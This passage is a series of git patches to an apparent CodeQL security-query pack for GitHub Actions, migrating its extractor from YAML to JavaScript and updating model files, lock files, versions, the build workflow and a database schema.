a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index 880b0d606da..cb7e0936cca 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index fd8172c6ca8..210c3365eda 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5cfa47a5cdf..89f8511812b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,14 +4,13 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.36 dependencies: + codeql/javascript-all: ^1.0.0 codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 codeql/controlflow: ^1.0.0 codeql/dataflow: ^1.0.0 -dbscheme: yaml.dbscheme -extractor: yaml -groups: - - yaml +extractor: javascript +groups: javascript dataExtensions: - ext/*.model.yml - ext/**/*.model.yml diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme deleted file mode 100644 index 20d83c71ee6..00000000000 --- a/ql/lib/yaml.dbscheme +++ /dev/null @@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats deleted file mode 100644 index 1c35ae98402..00000000000 --- a/ql/lib/yaml.dbscheme.stats +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 4b8239b7f6c..8110845ea1f 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -7,6 +7,12 @@ dependencies: version: 1.0.0 codeql/ssa: version: 1.0.0 + codeql/javascript-all: + version: 1.0.0 + codeql/regex: + version: 1.0.0 + codeql/tutorial: + version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 65bb672183f..669a8f88186 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -6,8 +6,9 @@ groups: - actions - queries suites: codeql-suites -extractor: yaml +extractor: javascript defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: + codeql/javascript-all: ^1.0.0 githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 4b8239b7f6c..8110845ea1f 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -7,6 +7,12 @@ dependencies: version: 1.0.0 codeql/ssa: version: 1.0.0 + codeql/javascript-all: + version: 1.0.0 + codeql/regex: + version: 1.0.0 + codeql/tutorial: + version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index e3304b4fe72..80ebd80b4c2 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -50,13 +50,13 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } query predicate sources(string action, string version, string output, string kind, string provenance) { - sourceModel(action, version, output, kind, provenance) + actionsSourceModel(action, version, output, kind, provenance) } query predicate summaries( string action, string version, string input, string output, string kind, string provenance ) { - summaryModel(action, version, input, output, kind, provenance) + actionsSummaryModel(action, version, input, output, kind, provenance) } query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index d85fc698394..1676d742d37 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,12 +1,10 @@ --- name: githubsecuritylab/actions-tests -groups: - - actions - - test +groups: [javascript, test] dependencies: githubsecuritylab/actions-all: ${workspace} githubsecuritylab/actions-queries: ${workspace} -extractor: yaml +extractor: javascript tests: . warnOnImplicitThis: true From df3d6131a8f754cec6514f5d715b75a33158efbd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 08:50:49 +0200 Subject: [PATCH 0328/1267] Update lock files --- ql/lib/codeql-pack.lock.yml | 2 ++ ql/src/codeql-pack.lock.yml | 8 ++++++-- ql/src/qlpack.yml | 4 +--- ql/test/codeql-pack.lock.yml | 8 ++++++-- 4 files changed, 15 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index c50889c1885..82795df0006 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -1,6 +1,8 @@ --- lockVersion: 1.0.0 dependencies: + codeql/controlflow: + version: 1.0.0 codeql/dataflow: version: 1.0.0 codeql/javascript-all: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 8110845ea1f..82795df0006 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -5,18 +5,22 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/ssa: - version: 1.0.0 codeql/javascript-all: version: 1.0.0 + codeql/mad: + version: 1.0.0 codeql/regex: version: 1.0.0 + codeql/ssa: + version: 1.0.0 codeql/tutorial: version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 + codeql/xml: + version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 669a8f88186..17e451718c5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -2,9 +2,7 @@ library: false name: githubsecuritylab/actions-queries version: 0.0.36 -groups: - - actions - - queries +groups: [actions, queries] suites: codeql-suites extractor: javascript defaultSuiteFile: codeql-suites/actions-code-scanning.qls diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 8110845ea1f..82795df0006 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -5,18 +5,22 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/ssa: - version: 1.0.0 codeql/javascript-all: version: 1.0.0 + codeql/mad: + version: 1.0.0 codeql/regex: version: 1.0.0 + codeql/ssa: + version: 1.0.0 codeql/tutorial: version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 + codeql/xml: + version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false From e2fb677abb6df7e47cb3f0e2d7f56ea5fabd950f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 09:48:27 +0200 Subject: [PATCH 0329/1267] Remove DS_Store --- .!79690!.DS_Store | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 .!79690!.DS_Store diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store deleted file mode 100644 index e69de29bb2d..00000000000 From e5eb85695dadf607ec0f31deeb7a93bc556912ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 10:04:50 +0200 Subject: [PATCH 0330/1267] Update action to use javascript extractor --- .github/action/dist/index.js | 10 +++++----- .github/action/src/codeql.ts | 2 +- .github/action/src/index.ts | 8 ++++---- 3 files changed, 10 insertions(+), 10 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 8ff1e7759d2..7bb3039fe48 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28604,7 +28604,7 @@ const toolcache = __importStar(__nccwpck_require__(7784)); const toolrunner = __importStar(__nccwpck_require__(8159)); async function newCodeQL() { return { - language: "yaml", + language: "javascript", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, @@ -28771,16 +28771,16 @@ async function run() { var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); await cql.runCommand(codeql, ["version", "--format", "terse"]); - // check yaml support + // check javascript support var languages = await cql.runCommandJson(codeql, [ "resolve", "languages", "--format", "json", ]); - if (!languages.hasOwnProperty("yaml")) { - core.setFailed("CodeQL Yaml extractor not installed"); - throw new Error("CodeQL Yaml extractor not installed"); + if (!languages.hasOwnProperty("javascript")) { + core.setFailed("CodeQL javascript extractor not installed"); + throw new Error("CodeQL javascript extractor not installed"); } // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 76eacd6eb67..08c4b420a4c 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -24,7 +24,7 @@ export interface CodeQLConfig { export async function newCodeQL(): Promise { return { - language: "yaml", + language: "javascript", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b1a4fc80c64..53a484ae6c1 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -15,7 +15,7 @@ export async function run(): Promise { await cql.runCommand(codeql, ["version", "--format", "terse"]); - // check yaml support + // check javascript support var languages = await cql.runCommandJson(codeql, [ "resolve", "languages", @@ -23,9 +23,9 @@ export async function run(): Promise { "json", ]); - if (!languages.hasOwnProperty("yaml")) { - core.setFailed("CodeQL Yaml extractor not installed"); - throw new Error("CodeQL Yaml extractor not installed"); + if (!languages.hasOwnProperty("javascript")) { + core.setFailed("CodeQL javascript extractor not installed"); + throw new Error("CodeQL javascript extractor not installed"); } // download pack From f068504c4f50710ae88d4bfed562b728538ac2f4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 10:07:36 +0200 Subject: [PATCH 0331/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 89f8511812b..51347aa2c3b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.36 +version: 0.1.0 dependencies: codeql/javascript-all: ^1.0.0 codeql/util: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 17e451718c5..e8c5259e9b8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.36 +version: 0.1.0 groups: [actions, queries] suites: codeql-suites extractor: javascript From f8dd493a684f58f816d883276132547409ae068c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 11:15:17 +0200 Subject: [PATCH 0332/1267] Update build.yml --- .github/workflows/build.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 78fec3b00eb..8ba664564b4 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -25,4 +25,6 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' + env: + GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} uses: ./ From c61e71f22d3faeb4ad118688a553bbf4104b2264 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 11:19:06 +0200 Subject: [PATCH 0333/1267] Update build.yml --- .github/workflows/build.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 8ba664564b4..9bc5b787fea 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -25,6 +25,6 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' - env: - GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} uses: ./ + with: + token: ${{ secrets.GHCR_TOKEN }} From fbaf329428eb998999d8aaa6935852490df15982 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:50:28 +0200 Subject: [PATCH 0334/1267] Remove dependencies with javascript-all --- ql/lib/codeql-pack.lock.yml | 10 - ql/lib/qlpack.yml | 1 - ql/src/codeql-pack.lock.yml | 10 - ql/src/qlpack.yml | 2 +- ql/src/semmlecode.javascript.dbscheme | 1190 + ql/src/semmlecode.javascript.dbscheme.stats | 28248 ++++++++++++++++++ ql/test/codeql-pack.lock.yml | 10 - 7 files changed, 29439 insertions(+), 32 deletions(-) create mode 100644 ql/src/semmlecode.javascript.dbscheme create mode 100644 ql/src/semmlecode.javascript.dbscheme.stats diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 82795df0006..4b8239b7f6c 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 51347aa2c3b..6a247cee330 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,7 +4,6 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.1.0 dependencies: - codeql/javascript-all: ^1.0.0 codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 codeql/controlflow: ^1.0.0 diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 82795df0006..4b8239b7f6c 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e8c5259e9b8..05f3408c578 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -5,8 +5,8 @@ version: 0.1.0 groups: [actions, queries] suites: codeql-suites extractor: javascript +dbscheme: semmlecode.javascript.dbscheme defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - codeql/javascript-all: ^1.0.0 githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/src/semmlecode.javascript.dbscheme b/ql/src/semmlecode.javascript.dbscheme new file mode 100644 index 00000000000..c88c69174bd --- /dev/null +++ b/ql/src/semmlecode.javascript.dbscheme @@ -0,0 +1,1190 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = @for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; +@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = @proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: @template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int 